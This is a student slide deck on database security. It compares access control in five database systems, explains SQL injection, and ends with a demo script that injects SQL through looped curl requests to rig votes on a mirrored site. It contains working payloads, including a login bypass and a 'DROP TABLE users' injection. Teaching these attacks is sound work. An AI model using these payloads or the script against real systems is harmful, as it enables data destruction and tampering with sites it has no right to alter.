Database Security Types of attacks and mitigation strategies Group Members: Tushar Sugandhi Natthapol Prakongpan Travis Whilden Brendan Kohlar Jonathan Reitnauer
Database Security
Types of attacks and mitigation strategies
Group Members:
Tushar Sugandhi
Natthapol Prakongpan
Travis Whilden
Brendan Kohlar
Jonathan Reitnauer
Database Access Control
Part I
Review Databases
• IBM DB2
• Oracle
• Microsoft SQL Server
• MySQL
• PostgreSQL
Security Mechanisms
• Authentication– Who is allowed access to the instance and/or database– Where and how a user's password will be verified
• Authorization– The authority level that a user is granted– The commands that a user is allowed to run– The data that a user is allowed to read and/or alter– The database objects a user is allowed to create, alter,
and/or drop• Privileges
– Granular authorization
IBM DB2 Authentication
– Works closely with the security features of the underlying operating system to verify user IDs and passwords.
– Can use Kerberos to authenticate users.
IBM DB2 Authorization
• Determine the operations that users and/or groups can perform.
• Determine the data objects that users can access.
• Five authority levels:– SYSADM– SYSCTRL– SYSMAINT– DBADM– LOAD
IBM DB2 Privileges
• More granular then authorities.
• Can be assigned to users and/or groups.
• Help define the objects that a user can create or drop.
• Help define the commands that a user can use to access objects (tables, views, indexes, packages).
Oracle Security
• Authentication (Identity Management)
• Virtual Private Database
• Oracle Label Security– Row Level Authentication
Oracle Identity Management
• LDAP Directory Service
• Directory integration and provision services
• Authentication and authorization services
• Certificate authority (CA)
Oracle Virtual Private Database
• Allow policy to be associated with specific columns in tables.
• Relevant Column and Masking
Oracle Label Security
• Provides a secure engine and data dictionary for managing access to data using sensitivity label.
• Row level security can be achieved with no programming required.
• Sensitivity labels are used to determine user’s ability to view and update data.
Oracle Label Security
Microsoft SQL Server
• Authentication
• Access Permission
• Roles
MS SQL Authentication
• Two methods for user authentication
• Windows authentication– Default and preferred– Secure authentication with underlying
operating system
• SQL Server authentication– Strongly discourage– Not as secure (Clear text password)
MS SQL Access Permission
• Statement Permissions
MS SQL Access Permission
• Object Permissions
MS SQL Roles
MySQL
• Limited Security Features
• Authentication
• Permission
MySQL Authentication
• User table/grant table in master database.
• Stored in plaintext.
• Can be view by anyone if not configured properly.
• No ties to OS.
• MySQL’s root has no password by default.
MySQL Permission
• Table level control
• Column level control
• No row level control
Postgre SQL Authentication
• Trust Authentication– OS-based
• Password Authentication– md5, crypt, or password through a user table
• Kerberos Authentication– Kerberos auth. server
• Ident-based Authentication– Username, password, machine, OS.
• Pluggable Authentication Module (PAM)– Custom authentication method.
Postgre SQL Permission
• Read– SELECT
• Append– INSERT
• Write– UPDATE/DELETE
• Rules– Allows a user to modify permission on a database.– Super user
Features Comparison
DB2 Oracle MS SQL MySQL Postgre
Authentication Multiple
Good
Multiple
Good
OS
No Option
User Table
Poor
Multiple
Good
Permission Good Good Good Poor Good
Row Level View Native View View View
SQL INJECTION ATTACKS
THE BASICS
Part II
What is SQL Injection?
• A security vulnerability exploiting the application layer of the database
• Improperly handled user input injected into DBMS as SQL statements
Where is it Done?
• Potentially any field requiring user input!– Attacking either the user handle or password in
login authentication is most commonly associated location of SQL Injection
Specifically…
• SQL Injection attacks can be broken down into the exploitation of two vulnerabilities– Improper removal of escape characters– Weak type enforcement
Vulnerability:Escape Characters• When escape characters used in SQL
query/command are not properly filtered from user input– Triggers an escape sequence from the current
query, such as setting a dummy value equal to itself
• The statement ‘X = X’ is always true
Example: Escape Characters Exploit• Application prompts user for userName:
– statement := "SELECT * FROM users WHERE name = '" + userName + "';“
• User injects partial SQL code into prompt:– a' or 't'='t
• statement becomes:– SELECT * FROM users WHERE name = 'a' or 't'='t';
• Or condition always returns true
Vulnerability:Weak Type Enforcement• When type constraints are not properly
implemented for user input– Malicious user injects a data type for input that
was not an intended value
Example:Weak Type Enforcement Exploit
• Application prompts user for numeric value for row selection for following code:
– statement := "SELECT * FROM data WHERE id = " + a_variable + ";“
• User injects string statement into prompt:– 1;DROP TABLE users
• statement becomes:– SELECT * FROM data WHERE id = 1;DROP TABLE users;
• Execution deletes users table from database
Protection From Attack
• Sanitize the data
• Secure the application
• Safeguard the input
• Use stored procedures
Protection:Sanitize the Data• More than simply adding backslashes!
– Need a default-deny regular expression to filter through only desired characters:
• s/[^0-9a-zA-Z]//\ returns only alphanumeric values
– Strip quotation marks
Protection:Secure the Application• People are the weakest link
– Limit access to only those who need it!– Set each individual’s access to lowest required
permissions
Protection:Safeguard the Input• Check your database interface for input
handling functions– Proper quote handling in string parsing– Deal with backslashes accordingly
Protection:Use Stored Procedures• A viable alternative…
– Resolves issues with dynamic input– Tailored to the specific needs of the database
DEMO
Part III
SQL Injection Demo
Attack a real website using SQL injection
SQL Injection Demo
• Bestthing.info: Comparing apples to oranges and oranges to racecars.
• User-driven content with database backend
• Quest to find the “best thing ever”
• Mirror of the site at injection.pycoder.net
Plan of attack
• Put a phrase at the top of the “Best” phrases
• Must get around the protection against duplicate ip addresses.
Site CodeHTML:<form method="post" action="/"> <div> <input name="tid0" value="27356" type="hidden" /> <input name="tid1" value="35705" type="hidden" /> <input name="A" type="submit" value="Having a funny hat" /> or <input name="B" type="submit" value="Bs" /> <br /><br /> <input type="submit" name="d" value="Report this pair as a duplicate." /> </div></form>
PHP:mysql_query('INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES ('.ip2long($_SERVER['REMOTE_ADDR']).',now(),'.$_POST['tid0'].','.$_POST['tid1'].','.(isset($_POST['A'])?1:0).')');if(mysql_affected_rows()>0) { mysql_query('UPDATE thing SET votesFor=votesFor+'.$forA.', votesTotal=votesTotal+1 WHERE tid='.$o); mysql_query('UPDATE thing SET votesFor=votesFor+'.($forA?0:1).', votesTotal=votesTotal+1 WHERE tid='.$t); }
Attack Code
Python Script:
#!/usr/bin/pythonimport random, commandsx = [random.randint(4000,400000)]for n in range(600): while True: p = random.randint(4000,400000) If not p in x: x.append(p) break commands.getoutput((r"curl -d tid0=%i,%i,1\)\ # -d tid1=-1\ or\”+ r“thing=\'test\' -d B=submit ”+ r“http://injection.pycoder.net" ) % (x[-2],x[-1]))
Thank you !!!